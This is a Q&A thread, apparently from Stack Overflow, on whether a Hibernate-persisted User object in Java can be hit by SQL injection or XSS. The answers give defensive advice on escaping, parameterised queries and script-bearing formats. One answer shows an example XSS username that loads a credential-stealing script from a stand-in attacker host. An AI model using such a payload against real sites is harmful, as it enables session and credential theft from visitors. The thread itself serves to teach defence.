# can attackers inject sql or javascripts into java POJOs?

Tags: java, hibernate, security, xss, sql-injection

I have a form where users can register to my website
The data is stored in a User POJO

```
class User{
private String userName;
private boolean enabled;
private Date registrationDate;
...
}
```

and then persisted to a database using

```
org.hibernate.Session.persist(User)
```

is there a way an attacker can do sql injection or XSS on the userName field ,contaminate the data or do any other type of attack and how do i protect against it?

Also can an attacker store sql statments or javascript code in a datatype other than String ?

Answer (score 0, accepted):

Clean usage of hibernate, say without doing ugly things, is safe. So **no SQL injection**.

However if the HTML form input is not guarded against JavaScript, you might get JS in a text in the database.

On outputing that text one must take care to do escapeHTML=true. **Then no XSS**.

*In general not a big problem, but be aware for developers' laziness on admin pages with dumps and such; those pages might be created more simply.*

On other formats: **SVG** (Scriptable Vector Format) is a beautiful scalable XML format for images, showable on HTML pages. They may however contain JavaScript for interaction.

The same holds for uploaded **richt text** and **spreadsheet** formats, sometimes saved in **BLOB**s in the database.

Answer (score 1):

https://www.owasp.org/index.php/Hibernate#A_note_about_SQL_injection

It is always better to validate form input. Since given object is relatively simple, it should not be a problem for you.

Also don't build your queries by string concatenation and use Query.setParameter() where needed. Those methods are dedicated for SQL-injection prevention and will eliminate this kind of risks.

Answer (score 1):

From what you've posted so far this looks vulnerable to XSS. 
What if I provide the following string for my username:

```
Username<script src="http://myevilsite.com/authstealer.js">
```

Anyone who sees my username on the site will run some js.

Perhaps you should [burp](https://en.wikipedia.org/wiki/Burp_suite) your site.